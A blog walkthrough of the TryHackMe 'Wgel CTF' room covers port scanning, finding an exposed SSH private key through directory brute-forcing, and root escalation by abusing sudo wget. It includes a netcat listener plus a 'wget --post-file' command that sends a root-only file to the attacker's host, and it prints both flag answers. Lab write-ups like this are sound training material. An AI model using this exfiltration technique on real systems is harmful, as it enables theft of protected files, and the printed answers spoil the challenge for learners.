[Hacking walkthrough] THM: Wgel CTF

[Hacking walkthrough] THM: Wgel CTF

Howdy there, welcome to another THM CTF challenge. Today, we are going to walk through a wget privilege escalation style CTF, just like the title suggests. This room is created by good old mrseth who in charge of the tweety and boiler CTF room. Always put the hint on the title. For me, this room is quite simple providing you are not overthinking again. Without further ado, let’s dig the hole.

Task 1: Capture the flags

Like the same old way, capture both user and root flags.

Task 1-2: User flag

First and foremost, enumerate the open port using Nmap scanner

$ nmap -A -v <Machine IP>

Look like we have two ports open wide in the machine which is Port 22 (SSH) and Port 80 (HTTP). Since we are not sure about the Port 22, Port 80 might be the only way in.

At first glance, this is just a normal apache2 default page. If you are a web developer or someone who makes use of the hacking apache page, you will notice something missing on the file table list. I’m highly suspected this page is tempered. Checking the source code of the page yield the following result.

Jessie huh? take note of that. After that, enumerate the site using gobuster for the hidden directory.

$ gobuster dir -u <Machine IP> -w /usr/share/dirb/wordlists/common.txt

Gotcha! We got a /sitemap directory. Exploiting the site won’t give us any information we need. Let’s perform another recursive search.

$ gobuster dir -u http://<Machine IP>/sitemap -w /usr/share/dirb/wordlists/common.txt

A hidden ssh directory? Let’s check it out.

Well, well, well, look what we got here, an RSA private key. Time to call Mr.john!

Hold your horse, no password for the private key? Cool, that makes thing simple. Alright lad, time to login into Jessie’s ssh with the private key.

$ ssh -i id_rsa [email protected]<Machine IP>

That’s it, we are inside Jessie’s SSH shell but where is the flag?

Don’t be a lazy bum, find the flag.

Answer: 057c67131c3d5e42dd5cd3075b198ff6

Task 1-2: Root flag

Time for the root flag. Let see what can jussie do with sudo?

Since we do not have the password to escalate as a superuser. The only way we can do is the wget privilege escalation. After a short search, I come across this article. Firstly, we need to open a port using Netcat.

$ nc -lvnp 4445

After that, punch in the following command in the Jessie ssh shell. The name of the flag file is root_flag.txt, just like the user one. The tunnel IP is your access IP.

$ sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4445

Bingo, we just captured the root flag.

Answer: b1b968b37519ad1daa6408188649263d

Conclusion

That’s all for the wgel CTF write-up. Another Linux Sudo command privilege escalation. Hope you learn something new today. Cheer! 😉

Share the knowledge

This Post Has 2 Comments

  1. ssh -i id_rsa [email protected]
    The authenticity of host ‘10.10.31.227 (10.10.31.227)’ can’t be established.
    ECDSA key fingerprint is SHA256:9XK3sKxz9xdPKOayx6kqd2PbTDDfGxj9K9aed2YtF0A.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added ‘10.10.31.227’ (ECDSA) to the list of known hosts.
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @ WARNING: UNPROTECTED PRIVATE KEY FILE! @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    Permissions 0644 for ‘id_rsa’ are too open.
    It is required that your private key files are NOT accessible by others.
    This private key will be ignored.
    Load key “id_rsa”: bad permissions
    [email protected]‘s password:

    i can’t acces to the machine. Any ideas?

    1. Hi there, you need to set the id _rsa to 600. Use this commnd

      chmod 600 id_rsa

      This is because the ssh private shouldn’t be accessible to third party

Leave a Reply

%d bloggers like this: